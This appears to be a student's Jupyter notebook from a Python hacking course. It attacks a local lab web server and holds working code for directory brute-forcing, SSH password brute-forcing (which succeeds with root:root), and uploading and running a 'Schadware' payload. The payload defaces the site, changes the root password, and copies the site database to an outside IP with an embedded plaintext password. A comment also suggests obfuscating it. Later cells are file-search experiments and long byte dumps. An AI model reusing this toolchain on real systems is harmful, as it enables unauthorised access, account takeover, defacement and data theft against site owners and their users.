In [3]:
import queue
import threading
import os
import requests
from urllib.request import urlopen, Request
from urllib.error import HTTPError
from bs4 import BeautifulSoup
from urllib import request
import urllib.request, urllib.error, urllib.parse
import re
from selenium import webdriver
import time
import paramiko
from collections import deque
import sys
import urllib3
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By

In [69]:
class MySpider():
    def __init__(self):
        pass
        
    def mygobuster(self,target):
        wordlist = [a.strip() for a in open("wordlist.txt")]
        filters = [".html",".css","jpg", "",".js",".md",".png"]
        html = open("html.txt", "a+") 
        for word in wordlist:
            for f in filters:
                url = target+word+f
                re = requests.head(url)

                if re.status_code==301 or re.status_code==401:
                    print("Directory found: ", re.url, re.status_code)
                    newurl = re.url+"/"
                    
                    self.mygobuster(newurl)

                elif re.status_code==200:
                    print("Found: ", re.url, re.status_code)
                    response = urllib.request.urlopen(url)
                    if ".html" in re.url:
                        html.write(re.url+"\n")
                    try:
                        Content = response.read().decode('utf-8')
                        f = open("found/"+str(re.url).replace("/",""), 'w+')
                        f.write(Content)
                        f.close()
                    except:
                        Content = response.read()
                        f = open("found/"+str(re.url).replace("/",""), 'wb+')
                        f.write(Content)
                        f.close()
                else:
                    continue

    def CSSbuster(self, target):
        r  = requests.get(" http://172.17.0.2:1337/stylesheet.css")
        data = r.text
        l = []
        for i in re.findall('url\(([^)]+)\)',data):
            l.append(i)
        s = [x[2:].strip('""') for x in l[:2]]
        for j in s:
            response = urllib.request.urlopen(target+j)
            if response.code==200:
                print("Picture found:", target+j)
                con = response.read()
                f = open("found/"+str(response.url).replace("/",""), 'wb+')
                f.write(con)
            else:
                pass
    
    
    def myBot(self):
        s=Service('/home/sleven/Studium/Sem5/Hacking-mit-Python/geckodriver')
        browser = webdriver.Firefox(service=s)
        for url in open("html.txt"):
            if url=="http://172.17.0.2:1337/biete.html\n":
                browser.get(url)
                time.sleep(1)
                eingabe = browser.find_element(By.ID,"ort")
                eingabe.send_keys("Salzburg")
                eingabe2 = browser.find_element(By.ID,"preis")
                eingabe2.send_keys("1500")
                time.sleep(1)
                eingabe2 = browser.find_element(By.ID,"zimmer")
                eingabe2.send_keys("5")
                eingabe3 = browser.find_element(By.ID,"flaeche")
                eingabe3.send_keys("500")
                eingabe4 = browser.find_element(By.ID,"kontakt")
                eingabe4.send_keys("Mori.r@web.de")
                ein = browser.find_element(By.ID,"saveimmoButton")
                ein.click()
                time.sleep(1)
            browser.get(url)


In [71]:
#S = MySpider()
S.mygobuster("http://172.17.0.2:1337/")
S.CSSbuster("http://172.17.0.2:1337/")
S.myBot()

Directory found:  http://172.17.0.2:1337/data 301
Directory found:  http://172.17.0.2:1337/data/about 301
Found:  http://172.17.0.2:1337/data/about/index.html 200
Directory found:  http://172.17.0.2:1337/data/faq 301
Found:  http://172.17.0.2:1337/data/faq/index.html 200
Directory found:  http://172.17.0.2:1337/data/impressum 301
Found:  http://172.17.0.2:1337/data/impressum/index.html 200
Directory found:  http://172.17.0.2:1337/data/datenschutz 301
Found:  http://172.17.0.2:1337/data/datenschutz/index.html 200
Directory found:  http://172.17.0.2:1337/data/about 301
Found:  http://172.17.0.2:1337/data/about/index.html 200
Directory found:  http://172.17.0.2:1337/data/impressum 301
Found:  http://172.17.0.2:1337/data/impressum/index.html 200
Directory found:  http://172.17.0.2:1337/img 301
Directory found:  http://172.17.0.2:1337/img/background-images 301
Found:  http://172.17.0.2:1337/about.html 200
Found:  http://172.17.0.2:1337/index.html 200
Found:  http://172.17.0.2:1337/biete.htm

**SSH Angriff**

In [4]:
def attackssh(ip):
    try:
        global que
        if len(que)==0:
            print("Not found, maybe try a new wordlist?!")
            return 1
        print("Attacking ssh.....")
        ssh = paramiko.SSHClient()
        ssh.set_missin
        _host_key_policy(paramiko.AutoAddPolicy())
        for line in range(len(que)):
            [username, password] = que.popleft().strip().split()
            try:
                print(f"Trying with {username} {password}")
                conn = ssh.connect(ip, username=username,password=password, banner_timeout=200)
                if conn is None:
                    print(username)
                    credentials = open("cred.txt", "r+")
                    credentials.write(username)
                    credentials.write(" ")
                    credentials.write(password)
                    print(f"Successfully Authenticated with {username} {password}")
                    break
            except paramiko.AuthenticationException:
                print("Failed!")
                continue
            
            except paramiko.SSHException:
                continue
                
    except NameError:
        que = deque()
        for word in open("sshwordlist.txt", "r").readlines():
            que.append(word)
        attackssh("172.17.0.2")        
        

In [5]:
attackssh("172.17.0.2")        


Attacking ssh.....
Trying with admin password
Failed!
Trying with root toor
Failed!
Trying with admin admin
Failed!
Trying with server admin
Failed!
Trying with sinus cosinus
Failed!
Trying with tangens riebert
Failed!
Trying with supp woritz
Failed!
Trying with win noch
Failed!
Trying with admin password
Failed!
Trying with root root
root
Successfully Authenticated with root root


In [15]:
#enumerate wordlist to check if recursive calling works properly
file = open("sshwordlist.txt")
newfile = open("ssh","w+")
for word, count in enumerate(file):
        newfile.write(str(count)+str(word))


In [7]:
r = requests.get("http://172.17.0.2:1337")
s = BeautifulSoup(r.text,"html.parser")
urls = []
for i in s.find_all("a"):
    hr = i.attrs['href']
    print(hr)

In [60]:
myscrape("http://172.17.0.2:1337/")

datenschutz.html


In [8]:
def myscrape(url):
    r = requests.get(url)
    soup = BeautifulSoup(r.text,"html.parser")
    
    for links in soup.find_all("a"):
        href = links.attrs['href']
        print(href)

In [9]:
myscrape("http://172.17.0.2:1337")

#
index.html
suche.html
biete.html
about.html
datenschutz.html
impressum.html
faq.html
biete.html
suche.html
angebote.html
myangebote.html
#
index.html
suche.html
biete.html
about.html
datenschutz.html


In [1]:
#Connecte zu server und lade datei hoch
from pwn import *
import time

In [2]:
s = ssh(host='172.17.0.2', user='root', password='root')


[x] Trying to bind to :: on port 0
[x] Trying to bind to :: on port 0: Trying ::
[+] Trying to bind to :: on port 0: Done
[x] Waiting for connections on :::34909
[x] Connecting to 172.17.0.2 on port 22
[+] Connecting to 172.17.0.2 on port 22: Done
[*] root@172.17.0.2:
    Distro    Ubuntu 20.04
    OS:       linux
    Arch:     amd64
    Version:  5.16.0
    ASLR:     Enabled


In [24]:
#Schadware

In [6]:
def getCredentials():
    #hole gefunde credentials aus datei
    cred = open('cred.txt','r').readlines()
    #case zu string
    cred_string = cred[0].split()
    #lese username und passwort aus
    user = cred_string[0]
    pw = cred_string[1]

'root'

In [7]:
#send file to remote host
def sendMalware():
    getCredentials()
    print("Sending SW.py to victim....")
    ostring = "sshpass -p " + pw +  " scp -o StrictHostKeyChecking=no SW.py "+ user+"@172.17.0.2:/root"
    os.system(ostring)
    

In [12]:
user

'root'

In [13]:
def ExecMalware():
    getCredentials()
    import paramiko
    import time

    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect('172.17.0.2', username=user, password=pw)

    time.sleep(1)
    #stdin, stdout, stderr = client.exec_command('apt install sshpass')
    stdin, stdout, stderr = client.exec_command('python3 SW.py')


    for line in stdout:
        print(line)

    client.close()


In [23]:
#schadware.py


In [94]:
import os
import subprocess
#defacnement of website
malware = open("../Web2-Projekt/public/index.html","w+")
malware.write("<!DOCTYPE html><html><head><title>foobar</title><style>h1 {text-align: center;color: red</style></head><body><h1>You have been compromised</h1></body></html>")

#change-cred
subprocess.run('echo -n "pwned\npwned" | passwd root', shell=True)
os.system("sshpass -p Freiburg1995 scp -o StrictHostKeyChecking=no ../Web2-Projekt/immobilie.db sleven@192.46.236.95:/home/sleven")

In [93]:
#obfuscate
#python -OO -m py_compile <your program.py>


'\npython3\nsshpass\n'

In [20]:
import os

for dirpath, dirname, filename in os.walk(path):
if name in filename:
print(os.path.join(dirpath, name)
filepath = findfile("file2.txt", "/")
print(filepath)

SyntaxError: invalid syntax (1466477447.py, line 3)

In [ ]:
findfile("index.html","home/sleven/")

In [24]:
import glob
filepath = glob.glob('index.txt', recursive=True)
print(filepath)

[]


In [21]:
for dirpath, dirname, filename in os.walk("home/sleven"):
        if name in "index.html":
            print(os.path.join(dirpath, name))

In [32]:
import subprocess
html = subprocess.run("find /home/sleven/ -name '*.html'", shell=True)
#for i in subprocess.run("find /home/sleven/ -name '*.html'", shell=True):
    #print(i)

/home/sleven/.config/VSCodium/User/History/-384f8b44/ZzYe.html
/home/sleven/.config/VSCodium/User/History/-384f8b44/zkAl.html
/home/sleven/.config/VSCodium/User/History/-384f8b44/PD1a.html
/home/sleven/.config/VSCodium/User/History/-384f8b44/PZkU.html
/home/sleven/.config/VSCodium/User/History/-384f8b44/PiEU.html
/home/sleven/.config/VSCodium/User/History/-384f8b44/Iv6E.html
/home/sleven/.config/VSCodium/User/History/-384f8b44/ToZa.html
/home/sleven/.config/VSCodium/User/History/-384f8b44/Qk4p.html
/home/sleven/.config/google-chrome/Default/Extensions/aapocclcgogkmnckokdopfmhonfmgoek/0.10_0/main.html
/home/sleven/.config/google-chrome/Default/Extensions/aohghmighlieiainnegkcijnfilokake/0.10_0/main.html
/home/sleven/.config/google-chrome/Default/Extensions/felcaaldnbdncclmgdcncolpebgiejap/1.2_0/main.html
/home/sleven/.config/google-chrome/Default/Extensions/pkedcjkdefgpdelpbcmbmeomcjbeemfm/8921.104.0.3_0/feedback.html
/home/sleven/.config/google-chrome/Default/Extensions/nmmhkkegccagdld

/home/sleven/Studium/Sem4/Web-Anw2/Mockup/14815700.672182.renderforestsites.com_files/14815700.672182.renderforestsites.com.html
/home/sleven/Studium/Sem4/Web-Anw2/ContactsAPI/src/api/public/bootstrap-icons/index.html
/home/sleven/Studium/Sem4/Web-Anw2/ContactsAPI/src/api/public/index.html
/home/sleven/Studium/Sem4/Web-Anw2/ContactsAPI/node_modules/sprintf-js/demo/angular.html
/home/sleven/Studium/Sem4/Web-Anw2/ContactsAPI/node_modules/superagent/docs/head.html
/home/sleven/Studium/Sem4/Web-Anw2/ContactsAPI/node_modules/superagent/docs/tail.html
/home/sleven/Studium/Sem4/Web-Anw2/ContactsAPI/node_modules/superagent/docs/test.html
/home/sleven/Studium/Sem4/Web-Anw2/ContactsAPI/node_modules/mocha/lib/browser/template.html
/home/sleven/Studium/Sem4/Web-Anw2/testing/node_modules/mocha/lib/browser/template.html
/home/sleven/Studium/Sem4/Web-Anw2/testing/node_modules/superagent/docs/head.html
/home/sleven/Studium/Sem4/Web-Anw2/testing/node_modules/superagent/docs/tail.html
/home/sleven/Studi

/home/sleven/anaconda3/pkgs/sphinx-2.2.0-py_0/site-packages/sphinx/themes/sphinxdoc/layout.html
/home/sleven/anaconda3/pkgs/sphinx-2.2.0-py_0/site-packages/sphinx/themes/agogo/layout.html
/home/sleven/anaconda3/pkgs/sphinx-2.2.0-py_0/site-packages/sphinx/themes/classic/layout.html
/home/sleven/anaconda3/pkgs/sphinx-2.2.0-py_0/site-packages/sphinx/themes/epub/layout.html
/home/sleven/anaconda3/pkgs/sphinx-2.2.0-py_0/site-packages/sphinx/themes/epub/epub-cover.html
/home/sleven/anaconda3/pkgs/jupyterlab_server-1.0.6-py_0/site-packages/jupyterlab_server/templates/403.html
/home/sleven/anaconda3/pkgs/jupyterlab_server-1.0.6-py_0/site-packages/jupyterlab_server/templates/error.html
/home/sleven/anaconda3/pkgs/jupyterlab_server-1.0.6-py_0/site-packages/jupyterlab_server/templates/index.html
/home/sleven/anaconda3/pkgs/astropy-3.2.2-py37h7b6447c_0/lib/python3.7/site-packages/astropy/io/ascii/tests/data/html2.html
/home/sleven/anaconda3/pkgs/astropy-3.2.2-py37h7b6447c_0/lib/python3.7/site-pack

/home/sleven/anaconda3/lib/python3.7/site-packages/alabaster/about.html
/home/sleven/anaconda3/lib/python3.7/site-packages/alabaster/donate.html
/home/sleven/anaconda3/lib/python3.7/site-packages/alabaster/layout.html
/home/sleven/anaconda3/lib/python3.7/site-packages/alabaster/navigation.html
/home/sleven/anaconda3/lib/python3.7/site-packages/alabaster/relations.html
/home/sleven/anaconda3/lib/python3.7/site-packages/sphinxcontrib/websupport/templates/searchresults.html
/home/sleven/anaconda3/lib/python3.7/site-packages/tornado/test/static/dir/index.html
/home/sleven/anaconda3/lib/python3.7/site-packages/tornado/test/templates/utf8.html
/home/sleven/anaconda3/lib/python3.7/site-packages/distributed/dashboard/templates/base.html
/home/sleven/anaconda3/lib/python3.7/site-packages/distributed/dashboard/templates/call-stack.html
/home/sleven/anaconda3/lib/python3.7/site-packages/distributed/dashboard/templates/json-index.html
/home/sleven/anaconda3/lib/python3.7/site-packages/distributed/

/home/sleven/.vscode-oss/extensions/samghelms.jupyter-notebook-vscode-0.0.2/src/notebook/node_modules/vm-browserify/example/run/index.html
/home/sleven/.vscode-oss/extensions/samghelms.jupyter-notebook-vscode-0.0.2/src/notebook/node_modules/webpack-dev-server/client/live.html
/home/sleven/.vscode-oss/extensions/samghelms.jupyter-notebook-vscode-0.0.2/node_modules/ua-parser-js/dist/ua-parser.html
/home/sleven/.vscode-oss/extensions/samghelms.jupyter-notebook-vscode-0.0.2/node_modules/codemirror/mode/rpm/changes/index.html
/home/sleven/.vscode-oss/extensions/samghelms.jupyter-notebook-vscode-0.0.2/node_modules/ansi_up/examples/browser_amd.html
/home/sleven/.vscode-oss/extensions/samghelms.jupyter-notebook-vscode-0.0.2/node_modules/ansi_up/examples/browser.html
/home/sleven/.vscode-oss/extensions/samghelms.jupyter-notebook-vscode-0.0.2/node_modules/through2/LICENSE.html
/home/sleven/.vscode-oss/extensions/samghelms.jupyter-notebook-vscode-0.0.2/node_modules/queue/coverage/lcov-report/inde

find: ‘/home/sleven/playground/aflresults/queue’: Permission denied
find: ‘/home/sleven/playground/aflresults/crashes’: Permission denied
find: ‘/home/sleven/playground/aflresults/hangs’: Permission denied
find: ‘/home/sleven/playground/afl/queue’: Permission denied
find: ‘/home/sleven/playground/afl/crashes’: Permission denied
find: ‘/home/sleven/playground/afl/hangs’: Permission denied


In [56]:
search = subprocess.Popen("find /home/sleven/ -name '*.html'", shell=True, stdout=subprocess.PIPE)
find = search.stdout.read()
for i in find:
    print(i)

find: ‘/home/sleven/playground/aflresults/queue’: Permission denied
find: ‘/home/sleven/playground/aflresults/crashes’: Permission denied
find: ‘/home/sleven/playground/aflresults/hangs’: Permission denied
find: ‘/home/sleven/playground/afl/queue’: Permission denied
find: ‘/home/sleven/playground/afl/crashes’: Permission denied
find: ‘/home/sleven/playground/afl/hangs’: Permission denied


47
104
111
109
101
47
115
108
101
118
101
110
47
46
99
111
110
102
105
103
47
86
83
67
111
100
105
117
109
47
85
115
101
114
47
72
105
115
116
111
114
121
47
45
51
56
52
102
56
98
52
52
47
90
122
89
101
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
46
99
111
110
102
105
103
47
86
83
67
111
100
105
117
109
47
85
115
101
114
47
72
105
115
116
111
114
121
47
45
51
56
52
102
56
98
52
52
47
122
107
65
108
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
46
99
111
110
102
105
103
47
86
83
67
111
100
105
117
109
47
85
115
101
114
47
72
105
115
116
111
114
121
47
45
51
56
52
102
56
98
52
52
47
80
68
49
97
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
46
99
111
110
102
105
103
47
86
83
67
111
100
105
117
109
47
85
115
101
114
47
72
105
115
116
111
114
121
47
45
51
56
52
102
56
98
52
52
47
80
90
107
85
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
46
99
111
110
102
105
103
47
86
83
67
111
100
105
117

105
100
111
109
47
52
46
52
54
46
50
95
48
47
100
101
118
116
111
111
108
115
45
112
97
110
101
108
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
46
99
111
110
102
105
103
47
99
104
114
111
109
105
117
109
47
68
101
102
97
117
108
116
47
69
120
116
101
110
115
105
111
110
115
47
103
105
103
104
109
109
112
105
111
98
107
108
102
101
112
106
111
99
110
97
109
103
107
107
98
105
103
108
105
100
111
109
47
52
46
52
54
46
50
95
48
47
100
101
118
116
111
111
108
115
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
46
99
111
110
102
105
103
47
99
104
114
111
109
105
117
109
47
68
101
102
97
117
108
116
47
69
120
116
101
110
115
105
111
110
115
47
103
105
103
104
109
109
112
105
111
98
107
108
102
101
112
106
111
99
110
97
109
103
107
107
98
105
103
108
105
100
111
109
47
52
46
52
54
46
50
95
48
47
112
114
111
120
121
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
46
108
111
99
97
108
47
115
104
97
114
101
47
106
117
112
1

103
49
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
68
101
115
107
116
111
112
47
83
116
117
100
105
117
109
47
83
101
109
50
47
87
101
98
65
110
119
49
47
66
108
97
116
116
50
47
112
97
103
101
50
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
68
101
115
107
116
111
112
47
83
116
117
100
105
117
109
47
83
101
109
50
47
87
101
98
65
110
119
49
47
66
108
97
116
116
50
47
115
99
114
111
108
108
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
68
101
115
107
116
111
112
47
83
116
117
100
105
117
109
47
83
101
109
50
47
87
101
98
65
110
119
49
47
66
108
97
116
116
50
47
65
117
102
103
97
98
101
50
44
55
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
68
101
115
107
116
111
112
47
83
116
117
100
105
117
109
47
83
101
109
50
47
87
101
98
65
110
119
49
47
66
108
97
116
116
50
47
65
117
102
103
97
98
101
50
44
56
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
68
101
115
107
11

65
110
100
114
111
105
100
83
116
117
100
105
111
50
48
50
49
46
49
47
108
111
103
47
105
110
100
101
120
105
110
103
45
100
105
97
103
110
111
115
116
105
99
47
109
121
97
112
112
108
105
99
97
116
105
111
110
46
53
49
101
100
48
99
55
57
47
100
105
97
103
110
111
115
116
105
99
45
50
48
50
50
45
48
51
45
49
49
45
48
48
45
50
57
45
50
54
46
50
52
48
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
68
111
119
110
108
111
97
100
115
47
97
99
116
111
103
114
97
109
109
45
109
111
99
107
117
112
118
49
46
50
46
100
114
97
119
105
111
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
68
111
119
110
108
111
97
100
115
47
97
99
116
111
103
114
97
109
109
45
109
111
99
107
117
112
118
49
46
50
46
100
114
97
119
105
111
40
49
41
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
68
111
99
117
109
101
110
116
115
47
83
116
117
100
105
117
109
47
87
101
98
50
45
80
114
111
106
101
107
116
47
115
116
97
116
105
99
47
98
111
111
116
11

111
111
116
115
116
114
97
112
45
52
46
48
46
48
47
100
111
99
115
47
52
46
48
47
101
120
97
109
112
108
101
115
47
115
116
97
114
116
101
114
45
116
101
109
112
108
97
116
101
47
105
110
100
101
120
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
68
111
99
117
109
101
110
116
115
47
83
116
117
100
105
117
109
47
87
101
98
50
45
80
114
111
106
101
107
116
47
115
116
97
116
105
99
47
98
111
111
116
115
116
114
97
112
45
52
46
48
46
48
47
100
111
99
115
47
52
46
48
47
101
120
97
109
112
108
101
115
47
115
116
105
99
107
121
45
102
111
111
116
101
114
45
110
97
118
98
97
114
47
105
110
100
101
120
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
68
111
99
117
109
101
110
116
115
47
83
116
117
100
105
117
109
47
87
101
98
50
45
80
114
111
106
101
107
116
47
115
116
97
116
105
99
47
98
111
111
116
115
116
114
97
112
45
52
46
48
46
48
47
100
111
99
115
47
52
46
48
47
101
120
97
109
112
108
101
115
47
115
116
105
99
107
121
45
102
111
111
116
101
1

109
101
47
115
108
101
118
101
110
47
83
116
117
100
105
117
109
47
83
101
109
50
47
87
101
98
65
110
119
49
47
66
108
97
116
116
50
47
112
97
103
101
50
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
83
116
117
100
105
117
109
47
83
101
109
50
47
87
101
98
65
110
119
49
47
66
108
97
116
116
50
47
115
99
114
111
108
108
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
83
116
117
100
105
117
109
47
83
101
109
50
47
87
101
98
65
110
119
49
47
66
108
97
116
116
50
47
65
117
102
103
97
98
101
50
44
56
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
83
116
117
100
105
117
109
47
83
101
109
50
47
87
101
98
65
110
119
49
47
66
108
97
116
116
50
47
65
117
102
103
97
98
101
50
44
52
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
83
116
117
100
105
117
109
47
83
101
109
50
47
87
101
98
65
110
119
49
47
66
108
97
116
116
50
47
65
117
102
103
97
98
101
50
44
55
46
104
116
109
108
10
47
104
111
109
101
47
1

46
48
47
95
105
110
99
108
117
100
101
115
47
102
111
111
116
101
114
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
83
116
117
100
105
117
109
47
83
101
109
52
47
87
101
98
45
65
110
119
50
47
87
101
98
50
45
80
114
111
106
101
107
116
47
112
117
98
108
105
99
47
115
116
97
116
105
99
47
98
111
111
116
115
116
114
97
112
45
52
46
48
46
48
47
95
105
110
99
108
117
100
101
115
47
104
101
97
100
101
114
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
83
116
117
100
105
117
109
47
83
101
109
52
47
87
101
98
45
65
110
119
50
47
87
101
98
50
45
80
114
111
106
101
107
116
47
112
117
98
108
105
99
47
115
116
97
116
105
99
47
98
111
111
116
115
116
114
97
112
45
52
46
48
46
48
47
95
105
110
99
108
117
100
101
115
47
115
99
114
105
112
116
115
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
83
116
117
100
105
117
109
47
83
101
109
52
47
87
101
98
45
65
110
119
50
47
87
101
98
50
45
80
114
111
106
101
107
116
47
112
117
98
108

KeyboardInterrupt: 

In [55]:
for i in find:
    print(i)

47
104
111
109
101
47
115
108
101
118
101
110
47
46
99
111
110
102
105
103
47
86
83
67
111
100
105
117
109
47
85
115
101
114
47
72
105
115
116
111
114
121
47
45
51
56
52
102
56
98
52
52
47
90
122
89
101
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
46
99
111
110
102
105
103
47
86
83
67
111
100
105
117
109
47
85
115
101
114
47
72
105
115
116
111
114
121
47
45
51
56
52
102
56
98
52
52
47
122
107
65
108
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
46
99
111
110
102
105
103
47
86
83
67
111
100
105
117
109
47
85
115
101
114
47
72
105
115
116
111
114
121
47
45
51
56
52
102
56
98
52
52
47
80
68
49
97
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
46
99
111
110
102
105
103
47
86
83
67
111
100
105
117
109
47
85
115
101
114
47
72
105
115
116
111
114
121
47
45
51
56
52
102
56
98
52
52
47
80
90
107
85
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
46
99
111
110
102
105
103
47
86
83
67
111
100
105
117

47
97
100
98
108
111
99
107
45
111
112
116
105
111
110
115
45
109
97
98
45
116
104
101
109
101
115
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
46
99
111
110
102
105
103
47
99
104
114
111
109
105
117
109
47
68
101
102
97
117
108
116
47
69
120
116
101
110
115
105
111
110
115
47
103
105
103
104
109
109
112
105
111
98
107
108
102
101
112
106
111
99
110
97
109
103
107
107
98
105
103
108
105
100
111
109
47
52
46
52
54
46
50
95
48
47
97
100
98
108
111
99
107
45
112
105
99
114
101
112
108
97
99
101
109
101
110
116
45
105
109
97
103
101
118
105
101
119
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
46
99
111
110
102
105
103
47
99
104
114
111
109
105
117
109
47
68
101
102
97
117
108
116
47
69
120
116
101
110
115
105
111
110
115
47
103
105
103
104
109
109
112
105
111
98
107
108
102
101
112
106
111
99
110
97
109
103
107
107
98
105
103
108
105
100
111
109
47
52
46
52
54
46
50
95
48
47
97
100
98
108
111
99
107
45
111
112
116
105
111
110
115
45
115
1

49
47
65
117
102
103
97
98
101
49
44
49
48
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
68
101
115
107
116
111
112
47
83
116
117
100
105
117
109
47
83
101
109
50
47
87
101
98
65
110
119
49
47
66
108
97
116
116
50
47
65
117
102
103
97
98
101
49
44
53
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
68
101
115
107
116
111
112
47
83
116
117
100
105
117
109
47
83
101
109
50
47
87
101
98
65
110
119
49
47
66
108
97
116
116
50
47
65
117
102
103
97
98
101
49
44
54
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
68
101
115
107
116
111
112
47
83
116
117
100
105
117
109
47
83
101
109
50
47
87
101
98
65
110
119
49
47
66
108
97
116
116
50
47
65
117
102
103
97
98
101
49
44
55
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
68
101
115
107
116
111
112
47
83
116
117
100
105
117
109
47
83
101
109
50
47
87
101
98
65
110
119
49
47
66
108
97
116
116
50
47
98
111
120
46
104
116
109
108
10
47
104
111
109
101
47
115


47
71
111
111
103
108
101
47
65
110
100
114
111
105
100
83
116
117
100
105
111
50
48
50
49
46
49
47
108
111
103
47
105
110
100
101
120
105
110
103
45
100
105
97
103
110
111
115
116
105
99
47
97
99
116
111
103
114
97
109
46
98
48
102
98
56
51
50
99
47
100
105
97
103
110
111
115
116
105
99
45
50
48
50
50
45
48
53
45
48
54
45
49
54
45
49
53
45
50
52
46
49
55
50
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
46
99
97
99
104
101
47
71
111
111
103
108
101
47
65
110
100
114
111
105
100
83
116
117
100
105
111
50
48
50
49
46
49
47
108
111
103
47
105
110
100
101
120
105
110
103
45
100
105
97
103
110
111
115
116
105
99
47
97
99
116
111
103
114
97
109
46
98
48
102
98
56
51
50
99
47
100
105
97
103
110
111
115
116
105
99
45
50
48
50
50
45
48
53
45
48
54
45
49
54
45
49
53
45
52
53
46
56
57
57
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
46
99
97
99
104
101
47
71
111
111
103
108
101
47
65
110
100
114
111
105
100
83
116
117
100
105
111
50
48
50
49
46
49

97
112
45
52
46
48
46
48
47
100
111
99
115
47
52
46
48
47
101
120
97
109
112
108
101
115
47
110
97
118
98
97
114
45
98
111
116
116
111
109
47
105
110
100
101
120
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
68
111
99
117
109
101
110
116
115
47
83
116
117
100
105
117
109
47
87
101
98
50
45
80
114
111
106
101
107
116
47
115
116
97
116
105
99
47
98
111
111
116
115
116
114
97
112
45
52
46
48
46
48
47
100
111
99
115
47
52
46
48
47
101
120
97
109
112
108
101
115
47
110
97
118
98
97
114
45
102
105
120
101
100
47
105
110
100
101
120
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
68
111
99
117
109
101
110
116
115
47
83
116
117
100
105
117
109
47
87
101
98
50
45
80
114
111
106
101
107
116
47
115
116
97
116
105
99
47
98
111
111
116
115
116
114
97
112
45
52
46
48
46
48
47
100
111
99
115
47
52
46
48
47
101
120
97
109
112
108
101
115
47
110
97
118
98
97
114
45
115
116
97
116
105
99
47
105
110
100
101
120
46
104
116
109
108
10
47
104
111
109
101
47
11

...

119
119
51
47
77
80
73
95
78
101
105
103
104
98
111
114
95
97
108
108
116
111
97
108
108
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
97
110
97
99
111
110
100
97
51
47
112
107
103
115
47
109
112
105
99
104
45
51
46
51
46
50
45
104
99
56
53
54
97
100
98
95
48
47
115
104
97
114
101
47
100
111
99
47
109
112
105
99
104
47
119
119
119
51
47
77
80
73
95
85
110
112
97
99
107
95
101
120
116
101
114
110
97
108
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
97
110
97
99
111
110
100
97
51
47
112
107
103
115
47
109
112
105
99
104
45
51
46
51
46
50
45
104
99
56
53
54
97
100
98
95
48
47
115
104
97
114
101
47
100
111
99
47
109
112
105
99
104
47
119
119
119
51
47
77
80
73
95
79
112
95
102
114
101
101
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
97
110
97
99
111
110
100
97
51
47
112
107
103
115
47
109
112
105
99
104
45
51
46
51
46
50
45
104
99
56
53
54
97
100
98
95
48
47
115
104
97
114
101
47
100
111
99
47
109
112
105
99
104
47

119
119
119
51
47
77
80
73
95
87
105
110
95
100
101
116
97
99
104
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
97
110
97
99
111
110
100
97
51
47
112
107
103
115
47
109
112
105
99
104
45
51
46
51
46
50
45
104
99
56
53
54
97
100
98
95
48
47
115
104
97
114
101
47
100
111
99
47
109
112
105
99
104
47
119
119
119
51
47
77
80
73
95
79
112
95
99
114
101
97
116
101
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
97
110
97
99
111
110
100
97
51
47
112
107
103
115
47
109
112
105
99
104
45
51
46
51
46
50
45
104
99
56
53
54
97
100
98
95
48
47
115
104
97
114
101
47
100
111
99
47
109
112
105
99
104
47
119
119
119
51
47
77
80
73
95
71
114
111
117
112
95
101
120
99
108
46
104
116
109
108
10
47
104
111
109
101
47
115
108
101
118
101
110
47
97
110
97
99
111
110
100
97
51
47
112
107
103
115
47
109
112
105
99
104
45
51
46
51
46
50
45
104
99
56
53
54
97
100
98
95
48
47
115
104
97
114
101
47
100
111
99
47
